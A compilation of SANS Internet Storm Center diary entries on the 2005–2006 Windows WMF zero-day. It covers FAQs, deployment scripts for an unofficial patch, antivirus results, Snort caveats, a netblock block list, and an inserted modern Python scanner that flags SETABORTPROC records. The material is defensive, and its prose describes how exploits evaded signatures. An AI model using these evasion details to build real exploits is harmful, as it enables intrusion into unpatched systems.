Just one more update - if you can't access the site, the main reason is that your DNS server(s) still don't have the updated (new) DNS entries. Ilfak changed the IP address of his site, so it will take a while for this to propagate.

Ilfak added several other servers - the DNS entries should have propagated changes by now so you should use the domain name (and let DNS servers help with load balancing).


Published: 2006-01-04

Lotus Notes Vulnerable to WMF 0-Day Exploit

John Herron at NIST.org discovered today that Lotus Notes versions 6.x and higher are vulnerable to the WMF 0-day exploit. In the advisory, located on the NIST website here, John reports that Lotus Notes remained vulnerable even after running the regsvr32 workaround in the Microsoft security advisory.

Update December 30, 2005

Our dedicated reader from Finland, Juha-Matti Laurio, has confirmed that IBM is aware of the vulnerability above. He had a couple of recommended workarounds for those using the Lotus Notes (Domino) system. I expect that IBM will be releasing an advisory directly with this information.

"1. Filter all common picture file extensions at the network perimeter.

The following file extensions are recommended:

BMP, DIB, EMF, GIF, ICO, JFIF, JPE, JPEG, JPG, PNG, RLE, TIF, TIFF and WMF, because Microsoft Windows handles picture files by the file header information, not by the file extension used.

2. Do not Open... or View... picture files from untrusted sources."

Thanks for that information Juha-Matti.

Update January 04, 2006

IBM has released an advisory that states the following:
"Lotus Notes allows users to optionally "View" or "Open" file attachments contained in email messages and documents. These attachments do not auto-launch or execute without user action."  Their recommendation is to follow the recommendations from Microsoft and apply the patch when available.  http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21227004

Scott Fendley
Handler on Duty


Published: 2006-01-03

WMF: patches and workarounds explained

We continue to get many questions on the WMF vulnerability, and are trying to explain it a bit more graphically.

Feel free to use the presentations below to explain why you need to use the unofficial patch or how it works on a high level.
To help you answer the "kill" questions:
  • You might not have seen exploits yet because:
    • You are lucky so far: estimates are that up to now 10% of our readers have seen them.
    • The bad guys haven't released their worst (yet), but we know they have the tools and means to create it and we expect them to do so well before the official patches are released next week.
    • The detection might be insufficient or might be failing, so you would not know it.
      (esp. if the attack was subtle enough in a first phase, it can be very hard to detect as it's designed to be very hard to detect by anti-virus and IDS/IPS systems)
    • We were told of McAfee reporting a 6% infection rate at their customers on New Year's Eve already.
But when you will see the exploits, it will be too late. So act now and be prepared for the coming storm.
  • The Internet Storm Center knows of quite a few government and larger organisations that did roll out the unofficial patch, so your "peers" might very well be doing the right thing already.
  • The usual precautions, such as telling the users not to click or surf to bad sites, updating anti-virus signatures, filtering email, ... will help just like a drop of water helps to fill a bucket. It's just not good enough by far.
    • No user interaction is required. This is one of those where the user is a sitting duck, not the offender.
    • Many anti-virus signatures still trigger on the payload, not on the call in the WMF and therefore might get a working signature only after you got hit. This can be more painful if you are unlucky to get hit early.
    • IDS/IPS can be easily bypassed by using off-the-shelf tools already available to the bad guys.
    • Firewalls will not prevent filesharing once the files are inside.
    • ...

In addition to this, please do distinguish between a vulnerability and the lack of an exploit.
  • One working exploit proves a vulnerability.
  • Many non-functional exploits prove nothing towards the lack of a vulnerability.

Swa Frantzen


Published: 2006-01-03


"Although the issue is serious and malicious attacks are being attempted, Microsoft's intelligence sources indicate that the scope of the attacks are not widespread."
- Microsoft Security Advisory (912840)

"...Microsoft's intelligence sources..."?!?

Go ahead and laugh.  I'll wait.

Through?  O.K.

While all of the rest of us were sleeping, it appears that the propeller-heads working on Billy Wonka's Official Microsoft Research and Development Team have been hard at work creating a crystal ball capable of foretelling the future.  The only problem: it appears that they made it from rose-colored crystal.

In their rosy vision of the future, over the next seven days, nothing bad is going to happen.  The fact that there are point-n-click toolz to build malicious WMFs chock full o' whatever badness the kiddiez can cook up doesn't exist in that future.  The merry, lil' Redmond Oompa Loompas are chanting "Our patch isn't ready / you have to wait / so keep antivirus / up-to-date" which makes perfectly accurate, current AV signatures appear on every Windows computer - even those with no antivirus software.

The future, according to Microsoft, is a wonderful, safe, chocolaty place.

And why not?  Everything just seems to work out for them!

Imagine!  You have tons and tons of work to do!  Even now, the Oompa Loompas are hard at work out in Redmond, simultaneously regression-testing and translating Microsoft's WMF patch into Swahili and Urdu.  And, somehow, as if by magic, all of this work will wind down at precisely the right moment so that the WMF patch doesn't have to be released "out of cycle."  How convenient!  Especially if you're wanting to avoid all of that nasty "Microsoft Releases Emergency Patch" publicity.

And remember, if something bad does happen to you during the next seven days, Billy Wonka and his Magic Metafiles aren't to blame.  You are!

"Customers who follow safe browsing best practices are not likely to be compromised by any exploitation of the WMF vulnerability. Users should take care not to visit unfamiliar or un-trusted Web sites that could potentially host the malicious code."

Why are you visiting places on the web you've never been before?  Restrict your browsing to safe places, and everything will be just fine.  'Cause no one could ever put a bad graphic file on a place you trust.

Tom Liston - Intelguardians Network Intelligence, L.L.C.


Published: 2006-01-03

.MSI installer file for WMF flaw available

For all of you corporate folk out there, we now have a .msi installer file available for version 1.4 of Ilfak Guilfanov's unofficial patch for the Windows .WMF flaw.  A very big "thank you" goes out to Evan Anderson of Wellbury Information Services, L.L.C. for his diligent efforts to get this put together.  Note:  Like Mr. Guilfanov's original patch, this will dump out not only Guilfanov's source code, but also the code that Evan wrote to do the install from within the .msi.  Note also:  We have reverse engineered and verified that the installation/uninstallation code in the .msi does what it says it does and nothing more.  The wmfhotfix.dll installed is the binary equivalent of the previously vetted version 1.4.

WMFHotfix-1.1.14.msi has an MD5 of 0dd56dac6b932ee7abf2d65ec34c5bec
A pgp signature using the SANS ISC key is available as well.


Published: 2006-01-03

MS to Release Update on Jan 10

Microsoft updated its advisory (KB 912840) this morning with the below information.  For those in academic environments, this may actually work in your favor as students will be coming back after the supposed release date. 

For corporate environments, IT staffers are going to have to make a risk assessment.  What would the cost be to your company if you are compromised between now and January 10, assuming the update is released as announced?  Can you really afford to do nothing?  Are you willing to gamble that unregistering the DLL is sufficient, or do you go with defense in depth and apply the unofficial patch?  You make the choice.

"Microsoft has completed development of the security update for the vulnerability. The security update is now being localized and tested to ensure quality and application compatibility. Microsoft's goal is to release the update on Tuesday, January 10, 2006, as part of its monthly release of security bulletins. This release is predicated on successful completion of quality testing.

The update will be released worldwide simultaneously in 23 languages for all affected versions of Windows once it passes a series of rigorous testing procedures. It will be available on Microsoft's Download Center, as well as through Microsoft Update and Windows Update. Customers who use Windows' Automatic Updates feature will be delivered the fix automatically.

Based on strong customer feedback, all Microsoft's security updates must pass a series of quality tests, including testing by third parties, to assure customers that they can be deployed effectively in all languages and for all versions of the Windows platform with minimum down time.

Microsoft has been carefully monitoring the attempted exploitation of the WMF vulnerability since it became public last week, through its own forensic capabilities and through partnerships within the industry and law enforcement. Although the issue is serious and malicious attacks are being attempted, Microsoft's intelligence sources indicate that the scope of the attacks are not widespread."


Published: 2006-01-02

Scripting the Unofficial .wmf Patch

Brent Hughes sent us a script that he used today to push the unofficial .wmf patch across his enterprise.  Here is what he sent us, and I suspect that it will work nicely with the updated patch from Ilfak.  Note that our html editor sometimes eats backslashes, apologies if that happens below.

I put the patches in netlogon to help distribute the load a bit across the domain controllers.  Here's just the relevant section of my script (in VBScript).  It assumes the patch always installs in c:\program files.  If program files is somewhere else you might have to find it [i.e. progdir = objShell.ExpandEnvironmentStrings("%programfiles%")].

Const HOTFIXDIR = "%home%\netlogon\patches"

' WScript.Shell runs commands (and expands %environment% variables in them);
' FileSystemObject is used to check whether the patch was installed earlier.
Set objShell = CreateObject("Wscript.shell")
Set oFSO = CreateObject("Scripting.FileSystemObject")

' The unofficial patch drops its source file here, so its presence means "already patched".
If NOT oFSO.FileExists("c:\program files\Windows\MetafileFix\wmfhotfix.cpp") Then
    objShell.Popup "Installing WMF unofficial patch", 5
    ' Unregister the vulnerable Picture and Fax Viewer DLL; /s suppresses the
    ' regsvr32 confirmation dialog, and the trailing arguments (hidden window,
    ' wait for completion) keep the installer from starting before it finishes.
    objShell.Run "%windir%\system32\regsvr32.exe /s /u %windir%\system32\shimgvw.dll", 0, True
    ' HOTFIXDIR has no trailing backslash, so add the path separator here.
    objShell.Run HOTFIXDIR & "\wmffix_hexblog13.exe /VERYSILENT /SUPPRESSMSGBOXES", 0, True
End If

You could batch file it too (though I've never tried this in group

@echo off
rem Skip the install if the patch's source file is already present (installed earlier)
if exist "c:\program files\windows\metafilefix\wmfhotfix.cpp" goto end
rem Unregister the vulnerable DLL silently, then run the unofficial patch installer
%windir%\system32\regsvr32.exe /s /u %windir%\system32\shimgvw.dll
%home%\netlogon\patches\wmffix_hexblog13.exe /VERYSILENT /SUPPRESSMSGBOXES
:end

Put one of those in a group policy under shutdown scripts and it should patch on reboot.  I'm still working on the best way to script rebooting the network, but I'll send that too when I've got it.



Published: 2006-01-02

VMWare Browser

In all of the confusion over the .wmf issue comes a bit of hope from one of our favorite vendors.  VMWare has a Browser Appliance virtual machine available for free download.  It's a BIG file (258Mb zipped) so be sure you have plenty of time for downloading.  The appliance can be run in either VMWare Workstation or the free VMWare Player and provides you with a safer environment for web surfing.  Thanks to John Holmblad for pointing this out to us. 

(Be sure that you are running the latest version of VMWare Workstation, since there was a security issue disclosed several days ago.  Also, note that the VMWare Player installation process asks if you want to install the Google desktop search application, which should remind you of yet another vector for the .wmf vulnerability to manifest itself.)

UPDATE - two more sandbox approaches to browsing were sent to us.  Morland Halliday said to check out www.greenborder.com, and Derrill Guilbert pointed us to www.sandboxie.com.  Thanks to both of you!


Published: 2006-01-02

Checking for .wmf Vulnerabilities

As far as we know there are no tools available yet for remote scanning and detection of systems vulnerable to the .wmf issue.  Ilfak Guilfanov has a testing tool available on his website, and he cautions users that it only checks for one version of the exploit so it might not detect new variations. 

If you want to experiment with another file submitted to us by Kevin Gennuso (thanks, Kevin) you can download it here.  The file will open calc.exe and kill explorer.exe on vulnerable systems but otherwise causes no damage as far as we can tell.  As always, test this file before using it on a production or enterprise computer.  This file is useful for seeing if Ilfak's patch worked for your system.

Reik Bohne sent us a link to a test on heise.de.  It's in German, but essentially it provides you with a way to check your browser and your email client to see if you are vulnerable.  Like the file above, it starts calc.exe on an unpatched system.


Published: 2006-01-02

.wmf FAQ Translations

Thanks to the work of several of our handlers and readers, we've got a nice set of FAQs in multiple languages:

Italiana and Italiana
Portugues - Br

More coming as they are submitted to us.


Published: 2006-01-02

Installing a Patch Silently

For those who are manually patching systems using Ilfak Guilfanov's unofficial patch, handler Tom Liston says that you can install it in an unattended mode by using this incantation:


More details are here.  We do not have a working .msi version and are actively seeking help from anybody who can get one working.  This will make life a whole lot easier for enterprise administrators.  Unfortunately the above command will not work pleasantly in a GPO startup script, since a reboot is required for it to take effect.  After the reboot, it will try to install again, which will create an annoying error message for users. 

A reminder:  be sure to test the patch above before deploying it across an enterprise.  While the handlers (including me) are running it on our own personal systems and it works as advertised, we can't vouch for any special software you might have in your own systems that could be disabled after the patch is installed.


Published: 2006-01-02

More .wmf Woes

The WMF issue continues to spin.  Overnight we received a note from HD Moore at Metasploit:

We released a new version of the metasploit framework module  for the WMF flaw, this one uses some header padding tricks and gzip encoding to bypass all known IDS signatures. Consider this "irresponsible" if you like, but it clearly demonstrates that a run-of-the-mill signature-based IDS (or A/V) is not going to work for this flaw. If anyone has any questions about why we are releasing these types of modules so early after the disclosure, feel free to drop me an email.



While many might disagree with what Moore and others are doing in the Metasploit project, be grateful that their efforts are "open" and available for both defenders and attackers to view.  If only the bad guys had the tools, then the good guys would be left guessing at how this stuff works.  This reminds me of how bad we felt in the early 1990s when SATAN was released.  We (the good guys) felt that they (the bad guys) had a tool that was "unfair" in that it allowed them to scan our networks looking for flaws.  Today of course no sysadmin worth his or her GIAC certification would run a network without scanning periodically for vulnerable systems.  So, if you haven't looked at the Metasploit project then today might be the day you should.  Think of it as a defender's best friend rather than an evil hacking tool.


Published: 2006-01-01

Updated version of Ilfak Guilfanov's patch

Ilfak Guilfanov has released an updated version of his unofficial patch for the Windows WMF issue.  We have reverse engineered, reviewed, and vetted the version here. Note: If you've already successfully installed the patch, this new version adds nothing new.  It only adds code to make it able to install on some other very specific configurations and code to recognize when the patch has already been installed.

MD5: 14d8c937d97572deb9cb07297a87e62a - wmffix_hexblog13.exe



Published: 2006-01-01

2nd generation WMF exploit: status of the anti-virus products after one day.

Yesterday, in a collaborative effort, we sent a true 0-day sample of the 2nd generation WMF exploit to VirusTotal. As expected, no detections were made. The payload in that sample was a very basic, commonly known and available payload, so the payload might get detected without the exploit being detected. But even there, we had no such luck then.

We sent in a similar sample today.

The results are not all that good:

  Product      Version   Date         Detection
  eTrust-Vet             01.01.2006   Win32/Worfo
  McAfee       4664      01.01.2006   Exploit-WMF
  Symantec     8.0       01.01.2006   Backdoor.Trojan

All the others failed to detect the sample.

Do note that the Symantec detection is most likely on the payload. That payload isn't what any of the bad guys playing with this will insert. They will insert far nastier and far less off-the-shelf stuff than what we did.

So for now you still have the best chance by following the advice in this diary entry.

Swa Frantzen


Published: 2006-01-01

Recommended Block List

I hate block lists... maybe because I have been on the 'wrong end' of them in the past. But after careful consideration, we do recommend blocking traffic from these two netblocks:

InterCage Inc.: ( -
Inhoster: ( -

The list may be updated later. We do not expect to make this a "regular feature". But at this time we find that it is necessary to point out these particular two netblocks.

They have been associated with a number of high-profile criminal activities in the past. A good number of WMF exploits use name servers or other resources in these netblocks. They have been non-responsive to current and past requests to remove malicious content.


Published: 2006-01-01

Trustworthy Computing

Looking forward to the week ahead, I find myself in the very peculiar position of having to say something that I don't believe has ever been said here in the Handler's diary before: "Please, trust us."

I've written more than a few diaries, and I've often been silly or said funny things, but now, I'm being as straightforward and honest as I can possibly be: the Microsoft WMF vulnerability is bad.  It is very, very bad.

We've received many emails from people saying that no one in a corporate environment will find using an unofficial patch acceptable.

Acceptable or not, folks, you have to trust someone in this situation.

To the best of my knowledge, over the past 5 years, this rag-tag group of volunteers hasn't asked for your trust: we've earned it.  Now we're going to expend some of that hard-earned trust:

This is a bad situation that will only get worse.  The very best response that our collective wisdom can create is contained in this advice - unregister shimgvw.dll and use the unofficial patch.  You need to trust us.

Looking back over the past year, the ISC handlers have faced up to any number of challenges: from worms and viruses to DNS poisoning and hurricanes.  We've done our best to keep you informed and to tell it like it is.  Somehow, it seems fitting that on the last day of 2005 we rang in the New Year in what can only be described as typical ISC style.

On December 31st, we received word that a "new and improved" version of the WMF exploit had been published.  This new exploit code generated WMF files that were sufficiently different that they bypassed nearly all AV and IDS signatures.  Publishing exploit code such as this for an unpatched vulnerability on a holiday weekend is, without any doubt, a totally irresponsible act.

And so, as the hours to the New Year slowly counted down, a group of volunteers gave up their holiday weekend to come together as a team and put their collective knowledge and intellect to work on the problems this reckless disclosure created.  Some tested the exploit, some talked to AV vendors, some worked toward finding a means to mitigate the vulnerability, some tested "fix" ideas and the resulting patches.

I was privileged to be a part of that team, and I'm incredibly proud of everyone who participated.  As it became obvious that the "fix" that we were working toward was essentially what had already been created by Ilfak Guilfanov, we wrote to him to ask if we could redistribute his patch from the ISC.  He was incredibly gracious and courteous in allowing us to do so and we were able to work with him to verify several changes that allowed the patch to work on a wider variety of Windows systems.

We have very carefully scrutinized this patch.  It does only what is advertised, it is reversible, and, in our opinion, it is both safe and effective.

The word from Redmond isn't encouraging.  We've heard nothing to indicate that we're going to see anything from Microsoft before January 9th. 

The upshot is this: You cannot wait for the official MS patch, you cannot block this one at the border, and you cannot leave your systems unprotected.

It's time for some real trustworthy computing.  All we're asking is if we've proved ourselves to be worthy of your trust.


Published: 2006-01-01

2nd generation WMF 0day Exploit Spammed

According to F-Secure's blog today, the 2nd generation WMF exploit has been spammed and "When the HappyNewYear.jpg hits the hard drive and is accessed (file opened, folder viewed, file indexed by Google Desktop), it executes and downloads a Bifrose backdoor (detected by us as Backdoor.Win32.Bifrose.kt) from www[dot]ritztours.com."

Trend Micro is calling it TROJ_NASCENE.H


Published: 2006-01-01


  • Why is this issue so important?
The WMF vulnerability uses images (WMF images) to execute arbitrary code. It will execute just by viewing the image. In most cases, you don't have to click anything. Even images stored on your system may cause the exploit to be triggered if they are indexed by some indexing software. Viewing a directory in Explorer with 'Icon size' images will cause the exploit to be triggered as well.
  • Is it better to use Firefox vs. Internet Explorer?
Internet Explorer will view the image without warning. New versions of Firefox will prompt you before opening the image. However, this will offer little protection, given that these are images, a file type frequently considered 'safe'.
  • What versions of Windows are affected?
All. Windows 2000, Windows XP (SP1 and SP2), Windows 2003. All are affected to some extent. Mac OS X, Unix and BSD are not affected.
  • What can I do to protect myself?
Microsoft has not yet released a patch. An unofficial patch was made available by Ilfak Guilfanov. Our own Tom Liston reviewed the patch and we tested it. The reviewed and tested version is available here (MD5: 99b27206824d9f128af6aa1cc2ad05bc). THANKS to Ilfak Guilfanov for providing the patch!!
You can unregister the related DLL (shimgvw.dll).
Virus checkers provide some protection.

Our current "best practice" recommendation is to both unregister the DLL and to use the unofficial patch.
  • Will unregistering the DLL protect me?
It might help. But it is not foolproof. We want to be very clear on this: we have some very strong indications that simply unregistering shimgvw.dll isn't always successful. The .dll can be re-registered by other processes, and there may be issues where re-registering the .dll on a running system that has had an exploit attempted against it will cause the exploit to succeed. In addition, it seems there might be issues in gdi32.dll, which cannot be unregistered all that easily.
  • Should I just delete the DLL?
Not a bad idea. But Windows File Protection may replace it. You have to turn off Windows File Protection first. Also, once an official patch is available you will need to replace the DLL (renaming it is probably better, so you have it handy).
  • Should I just block all .WMF images?
This may help, but it is not sufficient. WMF files are recognized by a special header and the extension is not needed. The files could arrive using any extension, or embedded in Word or other documents.
  • What is DEP (Data Execution Prevention) and how does it help me?
With Windows XP SP2, Microsoft introduced DEP. It protects against a wide range of exploits by preventing the execution of 'data segments'. However, to work well, it requires hardware support. Some CPUs, like AMD's 64-bit CPUs, will provide full DEP protection and will prevent the exploit.
  • How good are anti-virus products at preventing the exploit?
At this point, we are aware of versions of the exploit that will not be detected by antivirus engines. We hope they will catch up soon. But it will be a hard battle to catch all versions of the exploit. Up-to-date AV systems are necessary but likely not sufficient.
  • How could a malicious WMF file enter my system?
There are too many methods to mention them all. E-mail attachments, web sites and instant messaging are probably the most likely sources. Don't forget P2P file sharing and other sources.
  • Is it sufficient to tell my users not to visit untrusted web sites?
No. It helps, but it's likely not sufficient. We had at least one widely trusted web site (knoppix-std.org) which was compromised. As part of the compromise, a frame was added to the site redirecting users to a corrupt WMF file. "Trusted" sites have been used like this in the past.
  • What is the actual problem with WMF images here?
WMF images are a bit different from most other images. Instead of just containing simple 'this pixel has that color' information, WMF images can call external procedures. One of these procedure calls can be used to execute the code.
  • Should I use something like "dropmyrights" to lower the impact of an exploit?
By all means, yes. Also, do not run as an administrator-level user for everyday work. However, this will only limit the impact of the exploit, not prevent it. Also: web browsing is only one way to trigger the exploit. If the image is left behind on your system and later viewed by an administrator, you may get 'hit'.
  • Are my servers vulnerable?
Maybe... Do you allow the uploading of images? Email? Are these images indexed? Do you sometimes use a web browser on the server? In short: if someone can get an image onto your server, and the vulnerable DLL may look at it, your server may very well be vulnerable.
  • What can I do at my perimeter / firewall to protect my network?
Not much. A proxy server that strips all images from web sites? That probably won't go over well with your users. At least block .WMF images (see above about extensions...). If your proxy has some kind of virus checker, it may catch it. Same for mail servers. The less you allow your users to initiate outbound connections, the better. Close monitoring of user workstations may provide a hint if a workstation is infected.
  • Can I use an IDS to detect the exploit?
Most IDS vendors are working on signatures. Contact your vendor for details. Bleedingsnort.org is providing continuously improving signatures for Snort users.
  • If I get hit by the exploit, what can I do?
Not much :-(. It very much depends on the exact exploit you are hit with. Most of them will download additional components. It can be very hard, or even impossible, to find all the pieces. Microsoft offers free support for issues like that at 866-727-2389 (866 PC SAFETY).
  • Does Microsoft have information available?
But there is no patch at the time of this writing.


Published: 2006-01-01

Overview of the WMF related articles at the ISC

Since this is one of the more complex stories to follow I've made a quick overview of the WMF issues.

The first story on the WMF vulnerability and the initial exploit

The update explaining why we went to yellow the first time around

The story pointing to the Microsoft bulletin

The availability of the first snort sigs

The going back to green article

More WMF signatures

Lotus Notes affected

The band-aid post: deregistering not reliable, extension filtering not enough

The free phone number for Microsoft support

Indexing and WMF

Musings on how to protect organisations beyond the trivial

An IM worm found using the WMF stuff

The second exploit, back to yellow, new signatures and an unofficial patch


Swa Frantzen


Published: 2006-01-01

* New exploit released for the WMF vulnerability - YELLOW

New exploit

On New Year's Eve the defenders got a 'nice' present from the full disclosure community.

The source code claims to be made by the folks at metasploit and xfocus, together with an anonymous source.

Note: We have been able to confirm that this exploit works.  We are in the process of getting information to AV vendors ASAP.
The exploit generates files:
  • with a random size;
  • with no .wmf extension (.jpg is used), but it could be any other image extension;
  • with a random piece of junk in front of the bad call, carefully crafted to be larger than the MTU on an Ethernet network;
  • with a number of possible calls to run the exploit, as listed in the source;
  • with a random trailer.
From a number of scans we did through VirusTotal, we can safely conclude there is currently no anti-virus signature working for it. Similarly, it is very unlikely any of the current IDS signatures work for it.

Judging from the source code, it will likely be difficult to develop very effective signatures due to the structure of WMF files.

Infection rate

McAfee announced on the radio yesterday that they saw 6% of their customers having been infected with the previous generation of the WMF exploits. 6% of their customer base is a huge number.


Considering this upsets all defenses people have in place, we voted to go to yellow in order to warn the good guys out there they need to review their defenses.

We hate going back to yellow for something we were yellow on a couple of days ago and had returned to green, but the more we look at it, the uglier it gets.

UNofficial patch

We want to be very clear on this:  we have some very strong indications that simply un-registering the shimgvw.dll isn't always successful.  The .dll can be re-registered by other processes, and there may be issues where re-registering the .dll on a running system that has had an exploit attempted against it will cause the exploit to succeed.

For those of you wanting to try an unofficial patch with all the risks involved, please see here.
Initially it was only for Windows XP SP2.  Fellow handler Tom Liston worked with Ilfak Guilfanov to help confirm some information required to extend it to cover Windows XP SP1 and Windows 2000.

Note: I've taken this thing apart and looked at it very, VERY closely.  It does exactly what it advertises and nothing more. The wmfhotfix.dll will be injected into any process loading user32.dll.  It then patches (in memory) gdi32.dll's Escape() function so that it ignores any call using the SETABORTPROC (i.e. 0x09) parameter.  This should allow Windows to display WMF files normally while still blocking the exploit.  I want to give a HUGE thanks to Ilfak Guilfanov for building this and for allowing us to host and distribute it. (TL)
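The FAQ above notes that WMF files are recognized by their header rather than their extension and that the danger lies in the procedure call (the Escape/SETABORTPROC call the patch blocks), while the new exploit hides that call behind padding records of random size. As an added example, not code from the ISC, from Ilfak Guilfanov or from the Metasploit module, here is a Python scanner that identifies WMF data by its header and walks the record chain to flag SETABORTPROC escapes; the record layout and the META_ESCAPE (0x0626) constant come from the WMF file format, the sample files are constructed inline with no executable content, and the function names are my own.

```python
"""Structural scanner for Windows Metafile (WMF) data (added example).

It decides "is this a WMF?" from the header bytes (the extension is ignored)
and walks the record chain, so junk records of random size in front of a
META_ESCAPE/SETABORTPROC record cannot push it past a fixed byte offset.
"""
import struct
from dataclasses import dataclass, field
from typing import List

PLACEABLE_KEY = 0x9AC6CDD7   # key of the optional 22-byte "placeable" header
META_EOF = 0x0000            # record that terminates the metafile
META_ESCAPE = 0x0626         # record type carrying printer-escape calls
SETABORTPROC = 0x0009        # escape sub-function that registers a callback


@dataclass
class ScanResult:
    is_wmf: bool
    findings: List[str] = field(default_factory=list)

    @property
    def dangerous(self) -> bool:
        return any(f.startswith("SETABORTPROC") for f in self.findings)


def wmf_header_offset(data: bytes) -> int:
    """Offset of the 18-byte standard header if data is a WMF, else -1."""
    off = 0
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22
    if len(data) < off + 18:
        return -1
    ftype, header_words, version = struct.unpack_from("<HHH", data, off)
    # type 1 = memory, 2 = disk; the header is always 9 words; versions 1.0 / 3.0
    if ftype in (1, 2) and header_words == 9 and version in (0x0100, 0x0300):
        return off
    return -1


def scan_wmf(data: bytes, max_records: int = 100_000) -> ScanResult:
    """Walk every record; flag SETABORTPROC escapes and structural damage."""
    hdr = wmf_header_offset(data)
    if hdr < 0:
        return ScanResult(is_wmf=False)
    res = ScanResult(is_wmf=True)
    pos = hdr + 18
    saw_eof = False
    for _ in range(max_records):
        if pos + 6 > len(data):          # not even a record header left
            break
        size_words, func = struct.unpack_from("<IH", data, pos)
        if func == META_EOF:
            saw_eof = True
            break
        if size_words < 3:               # size counts its own 6-byte header
            res.findings.append(f"malformed record size {size_words} at offset {pos}")
            break
        end = pos + size_words * 2
        if end > len(data):
            res.findings.append(f"record at offset {pos} runs past end of file")
            break
        if func == META_ESCAPE and size_words >= 5:
            escape_fn, byte_count = struct.unpack_from("<HH", data, pos + 6)
            if escape_fn == SETABORTPROC:
                res.findings.append(
                    f"SETABORTPROC escape at offset {pos} ({byte_count} data bytes)")
        pos = end
    if not saw_eof:
        res.findings.append("no META_EOF record reached (truncated or malformed)")
    return res


# --- constructed samples for demonstration (no executable content) ----------
def record(func: int, params: bytes) -> bytes:
    """One WMF record: size in 16-bit words (header included), function, params."""
    assert len(params) % 2 == 0
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_sample(records: bytes, placeable: bool = False) -> bytes:
    """Wrap records in a standard disk-metafile header, optionally placeable."""
    body = records + record(META_EOF, b"")
    header = struct.pack("<HHHIHIH", 2, 9, 0x0300, (18 + len(body)) // 2, 0, 0, 0)
    if placeable:   # key, handle, bbox (l, t, r, b), units per inch, reserved, checksum
        header = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0) + header
    return header + body


# Harmless metafile: a single window-origin record (META_SETWINDOWORG, 0x020B).
BENIGN = build_sample(record(0x020B, struct.pack("<hh", 0, 0)))
# Same header, preceded by a 1.6 KB padding record (larger than an Ethernet MTU)
# and followed by an inert SETABORTPROC escape whose data is four zero bytes.
PADDED_ABORTPROC = build_sample(
    record(0x0324, b"\x00" * 1600)
    + record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 4) + b"\x00" * 4))

if __name__ == "__main__":
    for name, blob in (("benign.wmf", BENIGN), ("holiday.jpg", PADDED_ABORTPROC)):
        r = scan_wmf(blob)   # the .jpg name changes nothing: the header decides
        print(name, "wmf" if r.is_wmf else "not wmf", r.findings)
```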

Note #2: When MS comes out with a real patch, simply uninstall this from Add/Remove programs on the Control Panel.  Mr. Guilfanov did a great job with this...  (TL)

Patching with unofficial patches is very risky business; this comes without any guarantees of any kind.
Please do back out these unofficial patches before applying official patches from Microsoft.

Snort signatures

We are receiving signatures from Frank Knobbe that detect this newest variant, but we haven't done much testing for false positives or negatives at this point.

Frank also restated some warnings:

There is one important note in regards to ALL published signatures including this one. All these signatures will fail to detect the exploits when the http_inspect preprocessor is enabled with default settings. By default, the flow_depth of the preprocessor is 300 which is too short to cover the whole exploit. Should the exploit be transmitted on port 80 and http_inspect is enabled, no alert will occur. Note that it will still alert on any ports (using the all port sig below) that are not configured in http_inspect (i.e. FTP).
One solution is to add the statement "flow_depth 0" to the http_inspect preprocessor. This will tell the preprocessor not to truncate the reassembled pseudo-packet, but it will have an adverse impact on performance. On busy networks, this will lead to 100% CPU utilization of the Snort process and major packet drops.
So we're between a rock, a solid surface, and a hard place. The exploits are web based, yet the signature will fail with http_inspect enabled. With it disabled, Snort will miss all rules containing uricontent and pcre/U statements. With it enabled, and flow_depth set to 0, Snort will alert on the exploit, but also process all uricontent rules in such a fashion that its CPU utilization is skyrocketing.
The only viable solution at this point is to run two instances of Snort. One with your normal set of rules and http_inspect enabled with either the default or "sane" values for flow_depth. The second instance should run with http_inspect disabled or flow_depth set to 0, and process only rules that have to cover a larger than 300 byte area for content matches on ports configured in http_inspect. This two-pronged approach assures that Snort's performance is kept at normal levels, preventing packet loss.

Wishing all Windows machines a happy New Year, with a bit fewer nasty exploits.

Swa Frantzen


Published: 2006-01-01

From extreme to in depth

Warning: some might get offended by some of the initial thoughts in this story. Please read till the end before you vent the frustration.

I'm also not trying to bash on Microsoft. If I were I'd have borrowed a subject of some spam message I got recently: "forget microsoft, get big and hard". I'm just trying to show how you can come from an extreme reasoning to a workable solution to protect those assets that need protection.

Suppose you defend a place that has high to very high security needs and wants to avoid the wmf thing at all cost. Reasons to do this should be based on a risk assessment, but elements that might lead to such extreme conditions might include:
  • No patch in sight from Microsoft
  • Not wanting to infect peers such as customers
  • Not wanting to rely on anti-virus signatures when people are developing versions of the exploit with a highly random nature
  • Not wanting to rely on IDS devices due to the same randomness and the "it's too late already" aspect
Suppose you are basically just not capable of accepting the risk associated with the WMF vulnerability, almost no matter what you break. In such a case you have two big avenues to walk:
  • Ban Microsoft products in your environment
    • I told you we were going to start from the extreme viewpoint, so hold your horses.
    • What does it buy?
      • No windows, no windows WMF vulnerability
    • What does it not buy?
      • You still can pass on dangerous payload to others like to your customers.
      • If a single escaped machine remains or a single machine snuck back in, you still might get affected.
  • Ban all communication and/or file exchanges
    • Extreme again, isn't it? Moreover, it is perceived as very hard in a modern world.
    • What does it buy you?
      • You prevent yourself from getting and giving dangerous payload to all peers
    • What does it not buy you?
      • If a single file would sneak in, or be present already, you might still have a major problem
      • You have sacrificed a lot of the availability to gain confidentiality and or integrity
With those extreme paths in mind, think about what they can do for you: which parts can help in your setup and with your risk assessment.

Most of our readers do not have the extreme "at all cost" risk situations.

Most of us have a situation where we have a business, and the business must continue to operate. In such a business, however, you will identify, if you look for it, areas that might need more protection and are willing to sacrifice more for that protection than other parts of the same business.  That difference in need for protection is what you can play on to do something.

E.g.: Suppose I know the accounting department was considered sensitive and, due to the risk analysis performed, worthy of more extreme measures than other departments.

What could I try to do to use some of the very extreme ideas and build a safer solution for them now and in the next weeks ?
  • Isolate them from the rest of the company. Plug a firewall between them and the rest of the internal networks. Disallow all unneeded communication with the rest of the company, making sure their servers are on their new inside.
  • Use advanced networking solutions to prevent (accidental) hookup of unauthorized equipment to the sensitive network. E.g.:
    • Make sure switch ports automatically shut down when they try to learn a second MAC address
    • Assign only DHCP addresses to known MAC addresses
    • Kick unknown MAC addresses into a separate VLAN
    • Use layer 2 measures (such as private VLANs) to prevent client-to-client communication
  • Disallow dangerous usage:
    • Disallow IM
    • Disallow web surfing
    • Disallow email, or strip all attachments from the more secure email server they get access to.
